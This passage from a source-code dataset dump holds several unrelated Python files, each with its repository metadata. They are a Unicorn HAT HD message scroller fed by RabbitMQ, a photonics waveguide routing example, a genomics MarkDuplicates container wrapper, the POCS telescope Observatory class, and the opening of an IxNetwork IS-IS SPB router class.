    image = Image.new('RGB', (text_width, max(height, text_height)), (0, 0, 0))

    # To draw on our image, we must use PIL's ImageDraw
    draw = ImageDraw.Draw(image)

    # And now we can draw text at our desired (text_x, text_y) offset, using our loaded font
    draw.text((text_x, text_y), TEXT, fill=(255, 255, 255), font=font)

    # To give an appearance of scrolling text, we move a 16x16 "window" across the image we generated above
    # The value "scroll" denotes how far this window is from the left of the image.
    # Since the window is "width" pixels wide (16 for UHHD) and we don't want it to run off the end of the,
    # image, we subtract "width".
    for scroll in range(text_width - width):
        for x in range(width):
            # Figure out what hue value we want at this point.
            # "x" is the position of the pixel on Unicorn HAT HD from 0 to 15
            # "scroll" is how far offset from the left of our text image we are
            # We want the text to be a complete cycle around the hue in the HSV colour space
            # so we divide the pixel's position (x + scroll) by the total width of the text
            # If this pixel were half way through the text, it would result in the number 0.5 (180 degrees)
            hue = (x + scroll) / float(text_width)

            # Now we need to convert our "hue" value into r,g,b since that's what colour space our
            # image is in, and also what Unicorn HAT HD understands.
            # This list comprehension is just a tidy way of converting the range 0.0 to 1.0
            # that hsv_to_rgb returns into integers in the range 0-255.
            # hsv_to_rgb returns a tuple of (r, g, b)
            br, bg, bb = [int(n * 255) for n in colorsys.hsv_to_rgb(hue, 1.0, 1.0)]

            # Since our rainbow runs from left to right along the x axis, we can calculate it once
            # for every vertical line on the display, and then re-use that value 16 times below:
            for y in range(height):
                # Get the r, g, b colour triplet from pixel x,y of our text image
                # Our text is white on a black background, so these will all be shades of black/grey/white
                # ie 255,255,255 or 0,0,0 or 128,128,128
                pixel = image.getpixel((x + scroll, y))

                # Now we want to turn the colour of our text - shades of grey remember - into a mask for our rainbow.
                # We do this by dividing it by 255, which converts it to the range 0.0 to 1.0
                r, g, b = [float(n / 255.0) for n in pixel]

                # We can now use our 0.0 to 1.0 range to scale our three colour values, controlling the amount
                # of rainbow that gets blended in.
                # 0.0 would blend no rainbow
                # 1.0 would blend 100% rainbow
                # and anything in between would copy the anti-aliased edges from our text
                r = int(br * r)
                g = int(bg * g)
                b = int(bb * b)

                # Finally we colour in our finished pixel on Unicorn HAT HD
                unicornhathd.set_pixel(width - 1 - x, y, r, g, b)

        # Finally, for each step in our scroll, we show the result on Unicorn HAT HD
        unicornhathd.show()

        # And sleep for a little bit, so it doesn't scroll too quickly!
        time.sleep(0.04)
def main():
    """Run the RabbitMQ consumer loop.

    Reads messages from the 'hello' queue on the broker at 192.168.0.144 and
    scrolls each message body across the Unicorn HAT HD. Blocks forever.
    """
    # Connect to the broker and make sure the queue exists before consuming.
    conn = pika.BlockingConnection(pika.ConnectionParameters(host='192.168.0.144'))
    mq_channel = conn.channel()
    mq_channel.queue_declare(queue='hello')

    def on_message(ch, method, properties, body):
        # Echo the payload, then render it on the display.
        print(" [x] H5yr Received %r" % body)
        showText(body)

    # auto_ack: messages are acknowledged on delivery, before display finishes.
    mq_channel.basic_consume(queue='hello', on_message_callback=on_message, auto_ack=True)
    print(" Starting h5yr_mq consumer ....")
    print(' [*] Waiting for messages. To exit press CTRL+C')
    mq_channel.start_consuming()  # blocks until interrupted
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('Interrupted')
        try:
            # Bug fix: turn the display off BEFORE exiting. The original
            # called unicornhathd.off() on the line after sys.exit(0),
            # making it unreachable, so the HAT stayed lit after Ctrl+C.
            unicornhathd.off()
            sys.exit(0)
        except SystemExit:
            # Fall back to a hard exit if normal interpreter shutdown
            # is blocked (e.g. non-daemon threads still running).
            os._exit(0)
| 39.592593 | 117 | 0.62638 |
7f911b33404643ef23fa5f87a9b0afd47531d1bc | 597 | py | Python | src/pyphotonics/examples/autorouting2.py | rohanku/optics_lib | 54308416209bb797470d6a60eed7a39162598af5 | [
"BSD-3-Clause"
] | null | null | null | src/pyphotonics/examples/autorouting2.py | rohanku/optics_lib | 54308416209bb797470d6a60eed7a39162598af5 | [
"BSD-3-Clause"
] | null | null | null | src/pyphotonics/examples/autorouting2.py | rohanku/optics_lib | 54308416209bb797470d6a60eed7a39162598af5 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from pyphotonics.layout.routing import (
user_route,
write_paths_to_gds,
Port,
WaveguideGeometry,
)
from pyphotonics.config import PATH
# Three left-edge input ports stacked vertically at a 127 um pitch.
inputs = [Port(-11545.453, 2182.5 - 127 * i, 0) for i in range(3)]
# Two horizontally-oriented output ports plus one north-facing port.
outputs = [Port(-9435.453, 2055.5, np.pi), Port(-10695.453, 2055.5, 0)]
outputs += [Port(-10463.728 + 254 * i, 1826.777, np.pi / 2) for i in range(1)]
# Interactively route 0.8-wide waveguides between the two port sets,
# overlaying the existing example GDS layout.
geometry = WaveguideGeometry(0.8)
waveguides = user_route(
    geometry,
    [50, 62.75],
    inputs=inputs,
    outputs=outputs,
    current_gds=PATH.example_autoroute,
)
# Write the routed paths out on layer 1111.
write_paths_to_gds(waveguides, 'demo.gds', layer=1111)
| 24.875 | 75 | 0.671692 |
57e1f840cbee2df9deaaeb1789230f830495a4d3 | 975 | py | Python | PyHive/TOPMed/MarkDuplicates.py | elowy01/igsr_analysis | ffea4885227c2299f886a4f41e70b6e1f6bb43da | [
"Apache-2.0"
] | 3 | 2018-04-20T15:04:34.000Z | 2022-03-30T06:36:02.000Z | PyHive/TOPMed/MarkDuplicates.py | elowy01/igsr_analysis | ffea4885227c2299f886a4f41e70b6e1f6bb43da | [
"Apache-2.0"
] | 7 | 2019-06-06T09:22:20.000Z | 2021-11-23T17:41:52.000Z | PyHive/TOPMed/MarkDuplicates.py | elowy01/igsr_analysis | ffea4885227c2299f886a4f41e70b6e1f6bb43da | [
"Apache-2.0"
] | 5 | 2017-11-02T11:17:35.000Z | 2021-12-11T19:34:09.000Z | """
Created on 21 March 2019
@author: galdam
"""
from typing import Dict
from Utils.RunSingularity import Singularity
class MarkDuplicates(Singularity):
    """
    Runs the Mark Duplicates task in the broadinstitute/gtex_rnaseq singularity image.
    """
    PIPELINE = 'markdups'
    # Parameter names substituted into CMD by the Singularity base class.
    CMD_ARGS = ['bam_file', 'memory']
    CMD = ("python3 -u /src/run_MarkDuplicates.py {bam_file} {PREFIX} -o {WORKING_DIR} --memory {memory}")
    # Expected output files. 'md_bam_file' is None here because its name is
    # derived from the input BAM at runtime (see get_output_file_list).
    FILES = {
        'md_bam_file': None,
        'metrics': "{PREFIX}.marked_dup_metrics.txt"
    }

    def get_output_file_list(self) -> Dict[str, str]:
        """
        Return the mapping of output-file keys to file paths for this task.

        The output BAM name follows an unconventional pattern (the input BAM
        name with its extension replaced by '.md.bam'), so it cannot be a
        static template; it is computed here before delegating to the base
        class implementation.

        :return: dict of output-file key to path.
        """
        out_bam = self.param('bam_file')
        out_bam = out_bam.rsplit('.', 1)[0] + '.md.bam'
        # Bug fix: write to an instance-level copy instead of mutating the
        # shared class attribute. The original `self.FILES[...] = out_bam`
        # modified MarkDuplicates.FILES in place, leaking one instance's BAM
        # path into every other instance of the class.
        self.FILES = {**type(self).FILES, 'md_bam_file': out_bam}
        return super().get_output_file_list()
| 26.351351 | 106 | 0.64 |
5a73e08db63567e6676347de2cbcd532fc93164c | 27,289 | py | Python | src/panoptes/pocs/observatory.py | JAAlvarado-Montes/POCS | f475e1a75069bde9f72a631a99f432705d46b67b | [
"MIT"
] | null | null | null | src/panoptes/pocs/observatory.py | JAAlvarado-Montes/POCS | f475e1a75069bde9f72a631a99f432705d46b67b | [
"MIT"
] | null | null | null | src/panoptes/pocs/observatory.py | JAAlvarado-Montes/POCS | f475e1a75069bde9f72a631a99f432705d46b67b | [
"MIT"
] | null | null | null | import os
import subprocess
from collections import OrderedDict
from datetime import datetime
from astropy import units as u
from astropy.coordinates import get_moon
from astropy.coordinates import get_sun
from panoptes.pocs.base import PanBase
from panoptes.pocs.camera import AbstractCamera
from panoptes.pocs.dome import AbstractDome
from panoptes.pocs.images import Image
from panoptes.pocs.mount import AbstractMount
from panoptes.pocs.scheduler import BaseScheduler
from panoptes.pocs.utils.location import create_location_from_config
from panoptes.utils import current_time
from panoptes.utils import error
class Observatory(PanBase):
    def __init__(self, cameras=None, scheduler=None, dome=None, mount=None, *args, **kwargs):
        """Main Observatory class
        Starts up the observatory. Reads config file, sets up location,
        dates and weather station. Adds cameras, scheduler, dome and mount.
        Args:
            cameras (dict or None): Mapping of camera name to camera instance,
                each added via `add_camera`.
            scheduler (`pocs.scheduler.BaseScheduler` or None): Scheduler to install.
            dome (`pocs.dome.AbstractDome` or None): Dome controller, if any.
            mount (`pocs.mount.AbstractMount` or None): Mount controller, if any.
            *args, **kwargs: Passed through to `PanBase.__init__`.
        """
        super().__init__(*args, **kwargs)
        # Hardware slots start empty so the set_* validators below can inspect
        # the current value with getattr before replacing it.
        self.scheduler = None
        self.dome = None
        self.mount = None
        self.logger.info('Initializing observatory')
        # Setup information about site location
        self.logger.info('Setting up location')
        site_details = create_location_from_config()
        self.location = site_details['location']
        self.earth_location = site_details['earth_location']
        self.observer = site_details['observer']
        # One-time ephemeris calculations for today, cached for status reports.
        now = current_time()
        self._local_sun_pos = self.observer.altaz(now, target=get_sun(now)).alt  # Re-calculated by is_dark()
        self._local_sunrise = self.observer.sun_rise_time(now)
        self._local_sunset = self.observer.sun_set_time(now)
        self._evening_astro_time = self.observer.twilight_evening_astronomical(now, which='next')
        self._morning_astro_time = self.observer.twilight_morning_astronomical(now, which='next')
        # Set up some of the hardware.
        self.set_mount(mount)
        self.cameras = OrderedDict()
        self._primary_camera = None
        if cameras:
            self.logger.info(f'Adding cameras to the observatory: {cameras}')
            for cam_name, camera in cameras.items():
                self.add_camera(cam_name, camera)
        # TODO(jamessynge): Figure out serial port validation behavior here compared to that for
        # the mount.
        self.set_dome(dome)
        self.set_scheduler(scheduler)
        # Offset between latest image and the pointing image; set by analyze_recent().
        self.current_offset_info = None
        self._image_dir = self.get_config('directories.images')
        self.logger.success('Observatory initialized')
##########################################################################
# Helper methods
##########################################################################
def is_dark(self, horizon='observe', default_dark=-18 * u.degree, at_time=None):
"""If sun is below horizon.
Args:
horizon (str, optional): Which horizon to use, 'flat', 'focus', or
'observe' (default).
default_dark (`astropy.unit.Quantity`, optional): The default horizon
for when it is considered "dark". Default is astronomical twilight,
-18 degrees.
at_time (None or `astropy.time.Time`, optional): Time at which to
check if dark, defaults to now.
Returns:
bool: If it is dark or not.
"""
if at_time is None:
at_time = current_time()
horizon_deg = self.get_config(f'location.{horizon}_horizon', default=default_dark)
is_dark = self.observer.is_night(at_time, horizon=horizon_deg)
self._local_sun_pos = self.observer.altaz(at_time, target=get_sun(at_time)).alt
self.logger.debug(f"Sun {self._local_sun_pos:.02f} > {horizon_deg} [{horizon}]")
return is_dark
##########################################################################
# Properties
##########################################################################
@property
def sidereal_time(self):
return self.observer.local_sidereal_time(current_time())
@property
def has_cameras(self):
return len(self.cameras) > 0
@property
def primary_camera(self):
"""Return primary camera.
Note:
If no camera has been marked as primary this will return the first
camera in the OrderedDict as primary.
Returns:
`pocs.camera.Camera`: The primary camera.
"""
if not self._primary_camera and self.has_cameras:
return self.cameras[list(self.cameras.keys())[0]]
else:
return self._primary_camera
    @primary_camera.setter
    def primary_camera(self, cam):
        """Mark `cam` as the primary camera (also sets `cam.is_primary`)."""
        cam.is_primary = True
        self._primary_camera = cam
@property
def current_observation(self):
if self.scheduler is None:
self.logger.info(f'Scheduler not present, cannot get current observation.')
return None
return self.scheduler.current_observation
@current_observation.setter
def current_observation(self, new_observation):
if self.scheduler is None:
self.logger.info(f'Scheduler not present, cannot set current observation.')
else:
self.scheduler.current_observation = new_observation
    @property
    def has_dome(self):
        """True if a dome controller has been installed on this observatory."""
        return self.dome is not None
@property
def can_observe(self):
"""A dynamic property indicating whether or not observations are possible.
This property will check to make sure that the following are present:
* Scheduler
* Cameras
* Mount
If any of the above are not present then a log message is generated and
the property returns False.
Returns:
bool: True if observations are possible, False otherwise.
"""
checks = {
'scheduler': self.scheduler is not None,
'cameras': self.has_cameras is True,
'mount': self.mount is not None,
}
can_observe = all(checks.values())
if can_observe is False:
for check_name, is_true in checks.items():
if not is_true:
self.logger.warning(f'{check_name.title()} not present')
return can_observe
##########################################################################
# Device Getters/Setters
##########################################################################
    def add_camera(self, cam_name, camera):
        """Add camera to list of cameras as cam_name.
        Args:
            cam_name (str): The name to use for the camera, e.g. `Cam00`.
            camera (`pocs.camera.camera.Camera`): An instance of the `~Camera` class.
        Raises:
            AssertionError: If `camera` is not an `AbstractCamera` instance.
        """
        assert isinstance(camera, AbstractCamera)
        self.logger.debug(f'Adding {cam_name}: {camera}')
        # Re-using an existing name silently replaces that camera.
        if cam_name in self.cameras:
            self.logger.debug(
                f'{cam_name} already exists, replacing existing camera under that name.')
        self.cameras[cam_name] = camera
        # A camera flagged as primary takes over the primary slot.
        if camera.is_primary:
            self.primary_camera = camera
    def remove_camera(self, cam_name):
        """Remove cam_name from list of attached cameras.
        Note:
            If you remove and then add a camera you will change the index order
            of the camera. If you prefer to keep the same order then use `add_camera`
            with the same name as an existing camera to update the list and preserve
            the order.
        Args:
            cam_name (str): Name of camera to remove.
        Raises:
            KeyError: If no camera is registered under `cam_name`.
        """
        self.logger.debug('Removing {}'.format(cam_name))
        del self.cameras[cam_name]
    def set_scheduler(self, scheduler):
        """Sets the scheduler for the `Observatory`.
        Args:
            scheduler (`pocs.scheduler.BaseScheduler` or None): An instance of the
                `~BaseScheduler` class, or None to remove the current scheduler.
        Raises:
            TypeError: If `scheduler` is neither None nor a `BaseScheduler`.
        """
        self._set_hardware(scheduler, 'scheduler', BaseScheduler)
    def set_dome(self, dome):
        """Sets or removes the dome for the `Observatory`.
        Args:
            dome (`pocs.dome.AbstractDome` or None): An instance of the
                `~AbstractDome` class, or None to remove the current dome.
        Raises:
            TypeError: If `dome` is neither None nor an `AbstractDome`.
        """
        self._set_hardware(dome, 'dome', AbstractDome)
    def set_mount(self, mount):
        """Sets the mount for the `Observatory`.
        Args:
            mount (`pocs.mount.AbstractMount` or None): An instance of the
                `~AbstractMount` class, or None to remove the current mount.
        Raises:
            TypeError: If `mount` is neither None nor an `AbstractMount`.
        """
        self._set_hardware(mount, 'mount', AbstractMount)
def _set_hardware(self, new_hardware, hw_type, hw_class):
# Lookup the set method for the hardware type.
hw_attr = getattr(self, hw_type)
if isinstance(new_hardware, hw_class):
self.logger.success(f'Adding {new_hardware}')
setattr(self, hw_type, new_hardware)
elif new_hardware is None:
if hw_attr is not None:
self.logger.success(f'Removing hw_attr={hw_attr!r}')
setattr(self, hw_type, None)
else:
raise TypeError(f"{hw_type.title()} is not an instance of {str(hw_class)} class")
##########################################################################
# Methods
##########################################################################
    def initialize(self):
        """Initialize the observatory and connected hardware.
        Initializes the mount and, if a dome is present, connects to it.
        Cameras are expected to be initialized at construction time.
        """
        self.logger.debug("Initializing mount")
        self.mount.initialize()
        if self.dome:
            self.dome.connect()
    def power_down(self):
        """Power down the observatory. Currently just disconnects hardware.
        Disconnects the mount and dome if present; safe to call when either
        is missing.
        """
        self.logger.debug("Shutting down observatory")
        if self.mount:
            self.mount.disconnect()
        if self.dome:
            self.dome.disconnect()
@property
def status(self):
"""Get status information for various parts of the observatory."""
status = {'can_observe': self.can_observe}
now = current_time()
try:
if self.mount and self.mount.is_initialized:
status['mount'] = self.mount.status
current_coords = self.mount.get_current_coordinates()
status['mount']['current_ha'] = self.observer.target_hour_angle(now, current_coords)
if self.mount.has_target:
target_coords = self.mount.get_target_coordinates()
status['mount']['mount_target_ha'] = self.observer.target_hour_angle(now,
target_coords)
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get mount status: {e!r}")
try:
if self.dome:
status['dome'] = self.dome.status
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get dome status: {e!r}")
try:
if self.current_observation:
status['observation'] = self.current_observation.status
status['observation']['field_ha'] = self.observer.target_hour_angle(now,
self.current_observation.field)
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get observation status: {e!r}")
try:
status['observer'] = {
'siderealtime': str(self.sidereal_time),
'utctime': now,
'localtime': datetime.now(),
'local_evening_astro_time': self._evening_astro_time,
'local_morning_astro_time': self._morning_astro_time,
'local_sun_set_time': self._local_sunset,
'local_sun_rise_time': self._local_sunrise,
'local_sun_position': self._local_sun_pos,
'local_moon_alt': self.observer.moon_altaz(now).alt,
'local_moon_illumination': self.observer.moon_illumination(now),
'local_moon_phase': self.observer.moon_phase(now),
}
except Exception as e: # pragma: no cover
self.logger.warning(f"Can't get time status: {e!r}")
return status
def get_observation(self, *args, **kwargs):
"""Gets the next observation from the scheduler
Returns:
observation (pocs.scheduler.observation.Observation or None): An
an object that represents the observation to be made
Raises:
error.NoObservation: If no valid observation is found
"""
self.logger.debug("Getting observation for observatory")
if not self.scheduler:
self.logger.info(f'Scheduler not present, cannot get the next observation.')
return None
# If observation list is empty or a reread is requested
reread_fields_file = (
self.scheduler.has_valid_observations is False or
kwargs.get('reread_fields_file', False) or
self.get_config('scheduler.check_file', default=False)
)
# This will set the `current_observation`
self.scheduler.get_observation(reread_fields_file=reread_fields_file, *args, **kwargs)
if self.current_observation is None:
self.scheduler.clear_available_observations()
raise error.NoObservation("No valid observations found")
return self.current_observation
def cleanup_observations(self, upload_images=None, make_timelapse=None, keep_jpgs=None):
"""Cleanup observation list
Loops through the `observed_list` performing cleanup tasks. Resets
`observed_list` when done.
Args:
upload_images (None or bool, optional): If images should be uploaded to a Google
Storage bucket, default to config item `panoptes_network.image_storage` then False.
make_timelapse (None or bool, optional): If a timelapse should be created
(requires ffmpeg), default to config item `observations.make_timelapse` then True.
keep_jpgs (None or bool, optional): If JPG copies of observation images should be kept
on local hard drive, default to config item `observations.keep_jpgs` then True.
"""
if upload_images is None:
upload_images = self.get_config('panoptes_network.image_storage', default=False)
if make_timelapse is None:
make_timelapse = self.get_config('observations.make_timelapse', default=True)
if keep_jpgs is None:
keep_jpgs = self.get_config('observations.keep_jpgs', default=True)
process_script = 'upload-image-dir.py'
process_script_path = os.path.join(os.environ['POCS'], 'scripts', process_script)
if self.scheduler is None:
self.logger.info(f'Scheduler not present, cannot finish cleanup.')
return
for seq_time, observation in self.scheduler.observed_list.items():
self.logger.debug("Housekeeping for {}".format(observation))
observation_dir = os.path.join(
self._image_dir,
'fields',
observation.field.field_name
)
self.logger.debug(f'Searching directory: {observation_dir}')
for cam_name, camera in self.cameras.items():
self.logger.debug(f'Cleanup for camera {cam_name} [{camera.uid}]')
seq_dir = os.path.join(
observation_dir,
camera.uid,
seq_time
)
self.logger.info(f'Cleaning directory {seq_dir}')
process_cmd = [
process_script_path,
'--directory', seq_dir,
]
if upload_images:
process_cmd.append('--upload')
if make_timelapse:
process_cmd.append('--make-timelapse')
if keep_jpgs is False:
process_cmd.append('--remove-jpgs')
# Start the subprocess in background and collect proc object.
clean_proc = subprocess.Popen(process_cmd,
universal_newlines=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
self.logger.info('Cleaning directory pid={}'.format(clean_proc.pid))
# Block and wait for directory to finish
try:
outs, errs = clean_proc.communicate(timeout=3600) # one hour
if outs and outs > '':
self.logger.info(f'Output from clean: {outs}')
if errs and errs > '':
self.logger.info(f'Errors from clean: {errs}')
except Exception as e: # pragma: no cover
self.logger.error(f'Error during cleanup_observations: {e!r}')
clean_proc.kill()
outs, errs = clean_proc.communicate(timeout=10)
if outs and outs > '':
self.logger.info(f'Output from clean: {outs}')
if errs and errs > '':
self.logger.info(f'Errors from clean: {errs}')
self.logger.debug('Cleanup finished')
self.scheduler.reset_observed_list()
def observe(self):
"""Take individual images for the current observation
This method gets the current observation and takes the next
corresponding exposure.
"""
# Get observatory metadata
headers = self.get_standard_headers()
# All cameras share a similar start time
headers['start_time'] = current_time(flatten=True)
# List of camera events to wait for to signal exposure is done
# processing
observing_events = dict()
# Take exposure with each camera
for cam_name, camera in self.cameras.items():
self.logger.debug(f"Exposing for camera: {cam_name}")
try:
# Start the exposures
camera_observe_event = camera.take_observation(self.current_observation, headers)
observing_events[cam_name] = camera_observe_event
except Exception as e:
self.logger.error(f"Problem waiting for images: {e!r}")
return observing_events
    def analyze_recent(self):
        """Analyze the most recent exposure
        Compares the most recent exposure to the reference exposure and determines
        the offset between the two.
        Returns:
            The offset information produced by `Image.compute_offset`, or None
            if solving/analysis failed.
        """
        # Clear the offset info
        self.current_offset_info = None
        pointing_image_id, pointing_image = self.current_observation.pointing_image
        self.logger.debug(f"Analyzing recent image using pointing image: '{pointing_image}'")
        try:
            # Get the image to compare
            image_id, image_path = self.current_observation.last_exposure
            current_image = Image(image_path, location=self.earth_location)
            # Plate-solve even if a previous solution exists on disk.
            solve_info = current_image.solve_field(skip_solved=False)
            self.logger.debug(f"Solve Info: {solve_info}")
            # Get the offset between the two
            self.current_offset_info = current_image.compute_offset(pointing_image)
            self.logger.debug(f'Offset Info: {self.current_offset_info}')
            # Store the offset information
            self.db.insert_current('offset_info', {
                'image_id': image_id,
                'd_ra': self.current_offset_info.delta_ra.value,
                'd_dec': self.current_offset_info.delta_dec.value,
                'magnitude': self.current_offset_info.magnitude.value,
                'unit': 'arcsec',
            })
        except error.SolveError:
            # Plate solving failed; leave current_offset_info as None.
            self.logger.warning("Can't solve field, skipping")
        except Exception as e:
            # Any other analysis failure is logged but non-fatal.
            self.logger.warning(f"Problem in analyzing: {e!r}")
        return self.current_offset_info
    def update_tracking(self, **kwargs):
        """Update tracking with rate adjustment.
        The `current_offset_info` contains information about how far off
        the center of the current image is from the pointing image taken
        at the start of an observation. This offset info is given in arcseconds
        for the RA and Dec.
        A mount will accept guiding adjustments in number of milliseconds
        to move in a specified direction, where the direction is either `east/west`
        for the RA axis and `north/south` for the Dec.
        Here we take the number of arcseconds that the mount is offset and,
        via the `mount.get_ms_offset`, find the number of milliseconds we
        should adjust in a given direction, one for each axis.
        The minimum and maximum tracking corrections can be passed as keyword
        arguments (`min_tracking_threshold=100` and `max_tracking_threshold=99999`)
        or can be specified in the mount config settings.
        Args:
            **kwargs: Keyword arguments that are passed to `get_tracking_correction`
                and `correct_tracking`.
        """
        # No-op unless analyze_recent() has produced an offset.
        if self.current_offset_info is not None:
            self.logger.debug("Updating the tracking")
            # Get the pier side of pointing image
            _, pointing_image = self.current_observation.pointing_image
            pointing_ha = pointing_image.header_ha
            # header_ha may be a plain number or a Quantity; unwrap if needed.
            try:
                pointing_ha = pointing_ha.value
            except AttributeError:
                pass
            self.logger.debug("Pointing HA: {:.02f}".format(pointing_ha))
            correction_info = self.mount.get_tracking_correction(
                self.current_offset_info,
                pointing_ha,
                **kwargs
            )
            try:
                self.mount.correct_tracking(correction_info, **kwargs)
            except error.Timeout:
                # Non-fatal: tracking stays uncorrected for this cycle.
                self.logger.warning("Timeout while correcting tracking")
def get_standard_headers(self, observation=None):
"""Get a set of standard headers
Args:
observation (`~pocs.scheduler.observation.Observation`, optional): The
observation to use for header values. If None is given, use
the `current_observation`.
Returns:
dict: The standard headers
"""
if observation is None:
observation = self.current_observation
assert observation is not None, self.logger.warning(
"No observation, can't get headers")
field = observation.field
self.logger.debug("Getting headers for : {}".format(observation))
t0 = current_time()
moon = get_moon(t0, self.observer.location)
headers = {
'airmass': self.observer.altaz(t0, field).secz.value,
'creator': "POCSv{}".format(self.__version__),
'elevation': self.location.get('elevation').value,
'ha_mnt': self.observer.target_hour_angle(t0, field).value,
'latitude': self.location.get('latitude').value,
'longitude': self.location.get('longitude').value,
'moon_fraction': self.observer.moon_illumination(t0),
'moon_separation': field.coord.separation(moon).value,
'observer': self.get_config('name', default=''),
'origin': 'Project PANOPTES',
'tracking_rate_ra': self.mount.tracking_rate,
}
# Add observation metadata
headers.update(observation.status)
# Explicitly convert EQUINOX to float
try:
equinox = float(headers['equinox'].replace('J', ''))
except BaseException:
equinox = 2000. # We assume J2000
headers['equinox'] = equinox
return headers
def autofocus_cameras(self, camera_list=None, **kwargs):
"""
Perform autofocus on all cameras with focus capability, or a named subset
of these. Optionally will perform a coarse autofocus first, otherwise will
just fine tune focus.
Args:
camera_list (list, optional): list containing names of cameras to autofocus.
**kwargs: Options passed to the underlying `Focuser.autofocus` method.
Returns:
dict of str:threading_Event key:value pairs, containing camera names and
corresponding Events which will be set when the camera completes autofocus.
"""
if camera_list:
# Have been passed a list of camera names, extract dictionary
# containing only cameras named in the list
cameras = {cam_name: self.cameras[
cam_name] for cam_name in camera_list if cam_name in self.cameras.keys()}
if cameras == {}:
self.logger.warning(
"Passed a list of camera names ({}) but no matches found".format(camera_list))
else:
# No cameras specified, will try to autofocus all cameras from
# self.cameras
cameras = self.cameras
autofocus_events = dict()
# Start autofocus with each camera
for cam_name, camera in cameras.items():
self.logger.debug("Autofocusing camera: {}".format(cam_name))
try:
assert camera.focuser.is_connected
except AttributeError:
self.logger.debug(
'Camera {} has no focuser, skipping autofocus'.format(cam_name))
except AssertionError:
self.logger.debug(
'Camera {} focuser not connected, skipping autofocus'.format(cam_name))
else:
try:
# Start the autofocus
autofocus_event = camera.autofocus(**kwargs)
except Exception as e:
self.logger.error(
"Problem running autofocus: {}".format(e))
else:
autofocus_events[cam_name] = autofocus_event
return autofocus_events
def open_dome(self):
"""Open the dome, if there is one.
Returns: False if there is a problem opening the dome,
else True if open (or if not exists).
"""
if not self.dome:
return True
if not self.dome.connect():
return False
if not self.dome.is_open:
self.logger.info('Opening dome')
return self.dome.open()
def close_dome(self):
"""Close the dome, if there is one.
Returns: False if there is a problem closing the dome,
else True if closed (or if not exists).
"""
if not self.dome:
return True
if not self.dome.connect():
return False
if not self.dome.is_closed:
self.logger.info('Closed dome')
return self.dome.close()
| 38.489422 | 115 | 0.589835 |
9762874865c463e8b14fad474b7764e771e56200 | 24,015 | py | Python | ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/isisspbsimrouter_4d8d2b3596c2f006afcd75a76b6934ff.py | OpenIxia/ixnetwork_restpy | f628db450573a104f327cf3c737ca25586e067ae | [
"MIT"
] | 20 | 2019-05-07T01:59:14.000Z | 2022-02-11T05:24:47.000Z | ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/isisspbsimrouter_4d8d2b3596c2f006afcd75a76b6934ff.py | OpenIxia/ixnetwork_restpy | f628db450573a104f327cf3c737ca25586e067ae | [
"MIT"
] | 60 | 2019-04-03T18:59:35.000Z | 2022-02-22T12:05:05.000Z | ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/isisspbsimrouter_4d8d2b3596c2f006afcd75a76b6934ff.py | OpenIxia/ixnetwork_restpy | f628db450573a104f327cf3c737ca25586e067ae | [
"MIT"
] | 13 | 2019-05-20T10:48:31.000Z | 2021-10-06T07:45:44.000Z | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class IsisSpbSimRouter(Base):
"""SPB Simulated Router Edge
The IsisSpbSimRouter class encapsulates a list of isisSpbSimRouter resources that are managed by the user.
A list of resources can be retrieved from the server using the IsisSpbSimRouter.find() method.
The list can be managed by using the IsisSpbSimRouter.add() and IsisSpbSimRouter.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'isisSpbSimRouter'
_SDM_ATT_MAP = {
'Active': 'active',
'BridgePriority': 'bridgePriority',
'ConnectedVia': 'connectedVia',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'Errors': 'errors',
'Multiplier': 'multiplier',
'Name': 'name',
'SessionStatus': 'sessionStatus',
'SpSourceId': 'spSourceId',
'SpbTopologyCount': 'spbTopologyCount',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'SystemId': 'systemId',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
def __init__(self, parent, list_op=False):
super(IsisSpbSimRouter, self).__init__(parent, list_op)
@property
def Connector(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
if self._properties.get('Connector', None) is not None:
return self._properties.get('Connector')
else:
return Connector(self)
@property
def SpbSimEdgeTopologyList(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.spbsimedgetopologylist_5e9b551439bb252c1fa3e2c6948a1432.SpbSimEdgeTopologyList): An instance of the SpbSimEdgeTopologyList class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
